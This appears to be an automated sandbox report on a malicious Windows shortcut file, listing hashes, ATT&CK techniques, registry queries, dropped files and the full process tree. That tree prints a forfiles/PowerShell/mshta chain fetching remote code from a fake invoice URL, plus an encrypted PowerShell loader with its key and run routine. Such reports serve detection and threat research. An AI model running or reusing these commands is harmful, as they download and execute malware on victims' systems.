84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30

General

Target

84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Size

148KB
MD5

d39a73de9f109e3dba408e9481998206
SHA1

30651dada81443db0fde9c3a336955d27b6d9024
SHA256

84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
SHA512

09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
SSDEEP

24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

9 2780 mshta.exe
11 2780 mshta.exe
21 3768 powershell.exe
Downloads MZ/PE file

flow	pid	process
9	2780	mshta.exe
11	2780	mshta.exe
21	3768	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exeAcroRd32.exe

pid	process
2920	powershell.exe
2920	powershell.exe
3768	powershell.exe
3768	powershell.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2920 powershell.exe
Token: SeDebugPrivilege 3768 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

3300 AcroRd32.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

AcroRd32.exe

pid process

3300 AcroRd32.exe
3300 AcroRd32.exe
3300 AcroRd32.exe
3300 AcroRd32.exe
3300 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe

pid	process
3300	AcroRd32.exe

pid	process
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe
3300	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeforfiles.exepowershell.exemshta.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 2036 wrote to memory of 4516	2036	cmd.exe	forfiles.exe
PID 2036 wrote to memory of 4516	2036	cmd.exe	forfiles.exe
PID 4516 wrote to memory of 2920	4516	forfiles.exe	powershell.exe
PID 4516 wrote to memory of 2920	4516	forfiles.exe	powershell.exe
PID 2920 wrote to memory of 2780	2920	powershell.exe	mshta.exe
PID 2920 wrote to memory of 2780	2920	powershell.exe	mshta.exe
PID 2780 wrote to memory of 3768	2780	mshta.exe	powershell.exe
PID 2780 wrote to memory of 3768	2780	mshta.exe	powershell.exe
PID 3768 wrote to memory of 3300	3768	powershell.exe	AcroRd32.exe
PID 3768 wrote to memory of 3300	3768	powershell.exe	AcroRd32.exe
PID 3768 wrote to memory of 3300	3768	powershell.exe	AcroRd32.exe
PID 3300 wrote to memory of 1028	3300	AcroRd32.exe	RdrCEF.exe
PID 3300 wrote to memory of 1028	3300	AcroRd32.exe	RdrCEF.exe
PID 3300 wrote to memory of 1028	3300	AcroRd32.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3716	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe
PID 1028 wrote to memory of 3652	1028	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
2⤵
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
. mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpzB('3D2E22BEE13CCFE8B668DFE3870189AB65FC83A106ED0669AD4641C874CEFC917EC535ADDF89DF1FC0D291409C73E835B9F5E70CF0828A29B1A99FCA6F796F2A42503EAD3E20FB474BFCCBC35604C7DF567229A99309C37991C3C06D087F748ACC4BC05F5B87FDD9577382DC5E78E9AF8F258959DBD417148594A4E69F30F8BA09721A811C9154BF4F46C61B027E5E341F93E46D8A20C8C29F4EC25E5C686A83F3F134C5E02359C71996DDDA3CB61DC08A2EB6BE0D3BB39C00E9CD6C5B8E50425065FA05BE50EB58A186392882ABB24FD4D0628687F1E075817F6E330DC872782EC8EF3270D119F3F1EC86C7C67AB9FD26BF831DFCD080EFE275AD185384E578FB6FF21965BEBABF3D61F1298B71AA9FC44837B82550CF83C1CA66CF07FDD34B3A36310A571FD186CAA02874D83D539F0ED9044B8229A424D9B6082A7ACC921F90904F4DF72C046C6FD1C5F33D9111995AAD7C1C1DD1C2AB1663495AD4FA4A076957D6C02EA68AC2E44CCE5221002CB17CB5CE00989546834D261F7C9FEAF275945B6288E36BE0499F62C619DD95E5D74BCE21A67C9B3D7086F8A2BC180BC93D234878A2B0DE6149370967764D9A43A5B369191F8CA07CDA7F4C04EEA417515BBE36A47DB3F155508C8C012037E01E725505EA2CEF9DC3452A26D6CCCEEB8F53AB4E584DB03063509EDC34BD1631BC0D85131CD09FF34CB6F59C256EE3A3F103404A0F88BEE10B6013EBA9B9A71B168C53B1500E3EE8F5E3D826118E292F0BD55FDD0C5D4926161CC7FE9FB046F7A7A4BE387BF2C9A4CD81588044BB525721950179CD20BC45EDCF86DACC2D05515E4A58A7D4607A73C70D16BB5DF70BD51F26556B2B75F712CF6B33D805188BE16B94E6CF59787C2CAD2624B8DE1F1FD6555ADCD6B087438FE541F4E496F6A1A54088B41117481113DF53DEE84CA74EE438A319B822416D96A624AB4ADA351565AB1AB7910CB458083883D052E81D58BBD45FA51B2A392F60088ACC43D43965E09E3999B124A4D99742762C29FEE7420F1FEBEAA69BE53723E7C83A1A0A9AB74BD3474822C6D09A38219121F97EB315CC6A97AFFD96443F43BCCB405282E5D5F8C2E1607082372440DB310E54573087CA2C07CAD48324AAA6D911A31EBE54BC246CC77D449E0209925602A237BE857173875FF7CBDF566A584855FA36E7BA974C49E4AC6BA71F637954D6EC82596875886BD35B62A9C41EA16912E81F4625EFFEE2F5FCD66832EF3C439A748C8E6AA5C50B2992CA202119B2EBDB95ECE163FC8FF7B0501C611AFDCD510A004DE882C79B433EDD9B890926856A227E5785BA964677F025837F0C62EF77D4C9D609518E415D6DDC2396A5839D383F6432318DE07919F442E2D5D455313D4A5E6414B3670D6DA8A746844B6475984E7DC5722645FAE5C2734D64606B25DD735043ABF19ACE1D00CF1455D8DCB263FE49FF6DAF30B1D278A2B024AAFA5CD490FA75A3500718CB6C2D733C645F1D96145E4F47C3B9FFAB0A80D4806F9597AB6C16648E27BAE0DBAFEBCA1B9FC9CB65F38A195E4BF3C914D7EB77DF41FEBED9252B7AA6D055220D9B1BE5316F0934D2ACF837572E54605BB44920BC30963D120BE37D1424FC57F0BC5A94530924D42DB1D03E2DF2E25F9425495C81589DAB9FE1139AE45431DCCDE27404986F8ED2458E7515A420D2F40D110D146A7F3E0566F550A052B46A6AC139EBE3CC41082CAE82EC5846FEC3099D033661D49805ED48FE4F019ECC22D5684A78CE7960DA71ED832792147A535401F1498FAE1C2C4FAECFB4DA3EBF98E01C1B81D841AA94083C26C2E7AC676E83180756C3EC3BA39F08A527D5CA7063EA91228B210D40DA1428F93986B13C10BF132D27C85801CC49F8598B105227DB80FF777FB78B8D6537584E244FF98133C299B3DCD20BE4D4BEA88D068CDBD84F54F0E419FF9F730F7FC17BB140848191A0AE77DC3182584C1F0BBA1EFE230BA6F9BD64622D0EBB1B60D55C6DD5141BD03DC8E385CF9AD75D8CE161AD6433E790579D4C316320D3BF9B609ED9BC810E661092B5D2F824ECD168E1A288B1EC23A230DFEBD019DC175FE02FB070676A7482EAC99F984A1B33F24A05624DD8E8FE3B261186010881F43CBA3AF8581D0B62D6FD371276A0A6AC713BBF10E63835C647C6808C475CFDA4B5362CFB4709875D7C86AD7B698CE71A069C32FE65523E8D3E8C40DE1149F66CD1B651698F41D98DB91312BD04A1E012D728C2FB120EB74CFF9F93D064E541C8953EE17AAD25F9A2CE3116796F26552CF5C7F08B1B73411CB6622FBFC3A56EA8D19B6513611D36C25F7AC9428174BCC5D619DB2C87759D6E0C291582A50C887CD0E72F242760BC721B1271E4732B1FBEF23833AA9EE322D775365EDD7D0C2AF9E01C3492F003338D21E90287');$UcouF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) $bZUJiekdW.Substring(3)
5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3768

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"
6⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3300

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
7⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E6AEDB27F432304E6ED81363A252D92B --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:3716

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B77833394ACACF4D81CBC89CEB38473C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B77833394ACACF4D81CBC89CEB38473C --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
8⤵
PID:3652

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5F7CF3F19676428C515730C136013FA8 --mojo-platform-channel-handle=2288 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:4568

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=315ED158BB994A8A58771D47AABF07ED --mojo-platform-channel-handle=1796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:1908

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F8985E3B5675FA31BA7E88993F4C1C6D --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:856

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=5450EC5FBABEFB8387C3AE7BFE252D51 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=5450EC5FBABEFB8387C3AE7BFE252D51 --renderer-client-id=7 --mojo-platform-channel-handle=2440 --allow-no-sandbox-job /prefetch:1
8⤵
PID:1804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
da7bacc4dc80d1cf3abb0ada97a8e6dd

SHA1
19a4964cfa66d9f4b7b67c0ba782dba9ff78b000

SHA256
8a026e5ed92ac1b2fd26555db39e1d67984978798102a6ed9ac8e58579b3be91

SHA512
83d485599442f82d5382d5d8d52f64d243c9b0b5ceac496bef40d14c4582338e0a31778d82c2f43ae6d1a05965538e9eeb79b442c6620ee22eeffca0e3d4f03a

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhqn0wv5.anj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
